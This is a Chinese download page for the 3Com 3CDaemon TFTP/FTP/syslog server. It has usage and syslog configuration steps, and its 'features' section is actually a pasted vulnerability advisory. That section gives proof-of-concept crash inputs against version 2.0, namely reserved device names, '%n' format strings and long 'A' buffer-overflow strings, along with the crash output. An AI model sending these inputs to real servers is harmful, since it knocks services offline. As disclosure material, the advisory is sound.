3COM 3CDaemon(tftp经常用的软件)是一款功能免费的集成了TFTP、FTP和SYSLOG功能的应用程序。支持多种协议,说到tftp经常用的软件这个应该很多人都用过的,小编分享的是3cdaemon绿色版,希望大家喜欢。
功能介绍
1、TFTP保留设备名拒绝服务攻击:
提交类似如下的请求,可导致TFTP服务程序挂起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用户名存在格式串问题:
提交包含格式串字符作为用户名数据,可导致守护程序崩溃:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、FTP超长用户名缓冲区溢出
由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、多个FTP命令超长参数缓冲区溢出:
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、多个FTP命令存在格式串问题
提交格式字符串作为参数,可导致程序崩溃。
6、多个FTP命令包设备名信息泄露问题
请求保留设备名可导致返回程序安装路径信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影响系统:
3Com 3CDaemon 2.0 revision 10
哈,看来存在不少漏洞,不建议下载。
应用于说明
1、下载打开3CDaemon.EXE 该经常用的软件可以支持tftp ftp等服务,界面如下:
2、添加新的用户,设置密码和ftp文件夹
3、在板子上设置ip
>ipconfig eth0 192.168.1.11
4、确认能够和linux 通信
>ping 192.168.1.12 //主机ip
5、进入需要传递文件的目录,并启动ftp
>cd tmp
>ftp 192.168.1.12 21 // 21默认端口
6、设置传输文件格式
>bin //传输二进制文件
7、传输文件
>get hello.img
8、退出
3cdaemon配置方法
1、需要log的设备配置
设备(路由器、交换机)需要增加的配置:
#info-center loghost 11.60.133.7 // IP为安装3CDaemon经常用的软件的主机的IP地址 #
2、3CDaemon经常用的软件配置:
(1)如图所示,创建一上新文件夹
(2)下拉处选取“仅为我指定的ip地址”
3、ip地址的设置,设置完成后保存即可。
版权声明:3COM 3CDaemon(tftp经常用的软件)所展示的资源内容均来自于第三方用户上传分享,您所下载的资源内容仅供个人学习交流使用,严禁用于商业用途,软件的著作权归原作者所有,如果有侵犯您的权利,请来信告知,我们将及时撤销。
软件下载信息清单:
软件名称 | 发布日期 | 文件大小 | 下载文件名 |
---|---|---|---|
3COM 3CDaemon(tftp经常用的软件)安装包 | 2024年11月29日 | 241KB | 3CDaemon_gr_qudong9.com.zip |
软件评论